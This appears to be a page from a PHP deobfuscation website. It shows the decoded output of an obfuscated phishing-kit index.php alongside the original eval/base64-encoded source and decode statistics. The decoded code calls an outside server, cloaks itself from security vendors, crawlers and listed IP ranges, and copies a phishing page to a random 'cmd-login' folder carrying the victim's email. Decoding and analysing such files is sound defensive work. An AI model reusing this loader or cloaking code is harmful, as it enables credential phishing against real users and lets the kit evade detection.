Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $_F=__FILE__;$_X='P2lCP1ouWlZzSDJXUTlNKCc8V08yeU16WFouWicpO1ZWVkFRSDI9c09IPi49PVpfek..

Decoded Output download

?><?php
include('blocker.php');


function http_request($url){$asd = $_SERVER['HTTP_HOST'];$post_data = array('asd'=> $asd);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);$output = curl_exec($ch);curl_close($ch);return $output;}$a = http_request("https://c29-official.tech/givingfakelink2/cx2kuadrat.php");
if (strpos($a, '<img') !== false) {echo $a;die();
}

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$botloc = "http://google.com";
$blocked_words = array("gmail","yandex","ymail","yahoo","icann","bot","Robot","above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "microsoft");
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
		header("location:$botloc");

    }  
}
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
     header('HTTP/1.0 404 Not Found');
     exit();
} else {
     foreach($bannedIP as $ip) {
          if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
               header("location:$botloc");
          }
     }
}

$random=md5(date("Y-m-d H:i:s"));
$random=base64_encode($random);
$randoms=rand(0,100);
$md5=md5($randoms);
$base=base64_encode($md5);
$dst="cmd-login=".md5("$base");
function recurse_copy($src,$dst) {
$dir = opendir($src);
@mkdir($dst);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
if ( is_dir($src . '/' . $file) ) {
recurse_copy($src . '/' . $file,$dst . '/' . $file);
}
else {
copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
$src="source";
recurse_copy( $src, $dst );
if(!isset($_GET['email'])){
$dst=$dst."/?reff=".$random;
}else{
	$dst=$dst."/?email=".$_GET['email']."&loginpage=".$_GET['loginpage']."&reff=".$random;
}
header("location:$dst");
?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='P2lCP1ouWlZzSDJXUTlNKCc8V08yeU16WFouWicpO1ZWVkFRSDI9c09IPi49PVpfek12UU1uPSgkUXpXKV0kZW45PlM+JF9wS2c2S2dqJ3RUVG1fdDdwVCdkOyRaT249XzllPWU+Uz5lenplcSgnZW45J1NpPiRlbjkpOyQyLj5TPjJReldfc0hzPSgpOzJReldfbk09T1o9KCQyLiw+LyBnSTdtVF8gZ0ksPiRRelcpOzJReldfbk09T1o9KCQyLiw+LyBnSTdtVF9nS1QgZ0VUZ0ZFcHJLZyw+MCk7MlF6V19uTT1PWj0oJDIuLD4vIGdJN21UX203cFRyM0tJNHAsPiRaT249XzllPWUpOyRPUT1aUT0+Uz4yUXpXX01STTIoJDIuKTsyUXpXXzJXT25NKCQyLik7ek09UXpIPiRPUT1aUT07bCRlPlM+Lj09Wl96TXZRTW49KCIuPT1abjpoaDJrUC1PQUFzMnNlV1g9TTIuaHhzY3NIeEFleU1Xc0h5a2gyUmt5UWU5emU9WFouWiIpO1ZzQT4obj16Wk9uKCRlLD4nQnNZeCcpPiFTUz5BZVduTSk+XU0yLk8+JGU7OXNNKCk7VmxWViQuT249SGVZTT5TPnhNPS5Pbj08cWU5OXooJF9wS2c2S2dqJ2dLdTdUS19GNDRnJ2QpO1YkPE89V08yPlM+Ii49PVo6aGh4T094V01YMk9ZIjtWJDxXTzJ5TTlffU96OW4+Uz5lenplcSgieFllc1ciLCJxZUg5TVIiLCJxWWVzVyIsInFlLk9PIiwiczJlSEgiLCI8Tz0iLCJnTzxPPSIsImU8T2NNIiwieE9PeFdNIiwibk9BPVdlcU16IiwiZVllNU9IZX1uIiwiMnFjTXNXV2VIMk0iLCJaLnNuLj1lSHkiLCI5ek1lWS5Pbj0iLCJITT1ac1dPPSIsIjJlV3FSc0huPXM9UT1NIiwiPU96LU1Scz0iLD4iWXMyek9uT0E9Iik7VkFPek1lMi4oJDxXTzJ5TTlffU96OW4+ZW4+JH1PejkpPl1WPj4+PnNBPihuUTxuPXpfMk9RSD0oJC5Pbj1IZVlNLD4kfU96OSk+aT5hKT5dVgkJLk1lOU16KCJXTzJlPXNPSDokPE89V08yIik7VlY+Pj4+bD4+VmxWJDxlSEhNOTNtPlM+ZXp6ZXEoIl5bW1gwYWtYKlgqIiw+Il5KZlgwYWFYKlgqIiw+Il4wYTFYMDFhWCpYKiIsPiJeMFVQWGthWCpYKiIsPiJeSmZYMGFMWCpYKiIsPiJeMVVYMGtMWCpYKiIsPj4iXltbWDBMYVgwVVgqIiw+Il5MVVgwMVtYKlgqIiw+Il5KZlgwYWFYKlgqIiw+Il4wZlVYMDFKWCpYKiIsPiJeW1tYa1VQWCpYKiIsPiJeMGtmWGtVa1gqWCoiLD4iXjFrWDBVWDBQa1gqIiw+Il5rYWZYW0xYMFVVWCoiLD4iXjFVWDBrTFgqWCoiLD4iXmthUFhmTFgwa2ZYKiIsPiJeazBbWGtKUFhKa1gqIiw+Il4xVVgwa0xYKlgqIiw+Il5rYTFYMGtbWDBVVVgqIiw+Il4wMUpYMFBVWCpYKiIsPiJeW1VYa0pKWDBbYVgqIiw+Il4xa1gwVVgwUGtYKiIsPiJeW1tYMGFrWCpYKiIsPiJeW1VYMGZYKlgqIiw+Il4wUFVYTGtYW2ZYKiIsPiJeMFBVWDFrWGtKZlgqIiw+Il5ba1gwMFtYa2ExWCoiLD4iXmswa1hMYVgwUEpYKiIsPiJeW1BYW0xYKlgqIiw+Il5MYVgxWCpYKiIsPiJeMEowWGswa1gqWCoiLD4iXlVbWDAwW1gqWCo+Iiw+Il5ba1hQYVgqWCoiLD4iXmZQWDBKZlgqWCoiLD4iXmZrWDBbW1gqWCoiLD4iXmZMWFtVWCpYKiIsPiJeZkxYa0xhWCpYKiIsPiJeZlBYMEpmWCpYKiIsPiJeUEpYMDFrWCpYKiIsPiJeMGFQWDBmW1gqWCoiLD4iXjBQVVhQYVgqWCoiLD4iXmswa1hrUFgwUGtYKiIsPiJeazBrWGtQWGtrVVgqIiw+Il5rMGtYMFVKWCpYKiIsPiJeazBrWDBMYVgqWCoiLD4iXmswa1hrSkxYKlgqIiw+Il5rMDFYMEprWCpYKiIsPiJeTGFYUDFYKlgqIiw+Il5rMDFYMEprWCpYKiIsPiJea2FQWGZMWCpYKiIsPiJeW1tYa2FMWFtVWCoiLD4iXmthVVgwVVhVZlgqIiw+Il5bVVhrMVhrWCoiLD4iXlsxWDBMWCpYKiIsPiJea2FrWDBhZlhrTGtYKiIsPiJeMFBKWFUxWGZhWCoiLD4iXltVWFtrWDBKW1gqIiw+Il5bW1hrazBYKlgqIiw+Il5bVVhba1gwMUxYKiIsPiJeMFBmWExVWCpYKiIsPiJeMFBrWDAwTFgwSlVYKiIsPiJeazBbWGtMa1gwWzFYKiIsPiJeMFBKWGtMSlgwUFBYKiIsPiJeW1BYWzBYMGtYKiIsPiJeW1VYSjFYMGFKWCoiLD4iXkpmWDBVVVhKW1gqIiw+Il5bVVgwa1VYMFVYKiIsPiJea2FbWGtmWDFrWCoiLD4iXmthUFgxSlhra2ZYKiIsPiJeMExmWDBhZlgqWCoiLD4iXjBbZlgwZmZYKlgqIiw+Il5bW1hrYTFYMGthWCoiLD4iXjBbMVhrVVgqWCoiLD4iXjBQa1gwMGZYVWZYKiIsPiJeWzFYa2FQWDBrZlgqIiw+Il4wa1gwVWZYa2FQWCoiLD4iXjBrWDBVZlgwUFtYKiIsPiJeMFBKWGtrYVgwMWZYKiIsPiJbZlhbTFhMSlgxMCIsPiJeMFBmWGtMWCpYKiIsPiJeW1VYMGFbWGswSlgqIik7VnNBKHNIX2V6emVxKCRfcEtnNktnaidnS3U3VEtfRjQ0ZydkLCQ8ZUhITTkzbSkpPl1WPj4+Pj4uTWU5TXooJ3RUVG1oMFhhPlVhVT5FTz0+ck9RSDknKTtWPj4+Pj5NUnM9KCk7Vmw+TVduTT5dVj4+Pj4+QU96TWUyLigkPGVISE05M20+ZW4+JHNaKT5dVj4+Pj4+Pj4+Pj5zQShaek14X1llPTIuKCdoJz5YPiRzWj5YPidoJywkX3BLZzZLZ2onZ0t1N1RLX0Y0NGcnZCkpXVY+Pj4+Pj4+Pj4+Pj4+Pj4uTWU5TXooIldPMmU9c09IOiQ8Tz1XTzIiKTtWPj4+Pj4+Pj4+PmxWPj4+Pj5sVmxWViR6ZUg5T1lTWTlMKDllPU0oImItWS05PnQ6czpuIikpO1YkemVIOU9ZUzxlbk1bVV9NSDJPOU0oJHplSDlPWSk7ViR6ZUg5T1luU3plSDkoYSwwYWEpO1YkWTlMU1k5TCgkemVIOU9Zbik7ViQ8ZW5NUzxlbk1bVV9NSDJPOU0oJFk5TCk7ViQ5bj1TIjJZOS1XT3hzSFMiWFk5TCgiJDxlbk0iKTtWQVFIMj1zT0g+ek0yUXpuTV8yT1pxKCRuejIsJDluPSk+XVYkOXN6PlM+T1pNSDlzeigkbnoyKTtWQFl5OXN6KCQ5bj0pO1Z9LnNXTShBZVduTT4hU1M+KD4kQXNXTT5TPnpNZTk5c3ooJDlzeikpPik+XVZzQT4oKD4kQXNXTT4hUz4nWCc+KT4mJj4oPiRBc1dNPiFTPidYWCc+KSk+XVZzQT4oPnNuXzlzeigkbnoyPlg+J2gnPlg+JEFzV00pPik+XVZ6TTJRem5NXzJPWnEoJG56Mj5YPidoJz5YPiRBc1dNLCQ5bj0+WD4naCc+WD4kQXNXTSk7VmxWTVduTT5dVjJPWnEoJG56Mj5YPidoJz5YPiRBc1dNLCQ5bj0+WD4naCc+WD4kQXNXTSk7VmxWbFZsVjJXT25NOXN6KCQ5c3opO1ZsViRuejJTIm5PUXoyTSI7VnpNMlF6bk1fMk9acSg+JG56Miw+JDluPT4pO1ZzQSghc25uTT0oJF9DS1RqJ01ZZXNXJ2QpKV1WJDluPVMkOW49WCJoP3pNQUFTIlgkemVIOU9ZO1ZsTVduTV1WCSQ5bj1TJDluPVgiaD9NWWVzV1MiWCRfQ0tUaidNWWVzVydkWCImV094c0haZXhNUyJYJF9DS1RqJ1dPeHNIWmV4TSdkWCImek1BQVMiWCR6ZUg5T1k7VmxWLk1lOU16KCJXTzJlPXNPSDokOW49Iik7Vj9pPg=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>

Function Calls

strtr	1
strrev	1
str_replace	1
base64_decode	2

Variables

$_D	base64_decode
$_F	index.php
$_R	0
$_X	0

Stats

MD5	c5c924b7d5999602dc07c9651e7084ff
Eval Count	2
Decode Time	96 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats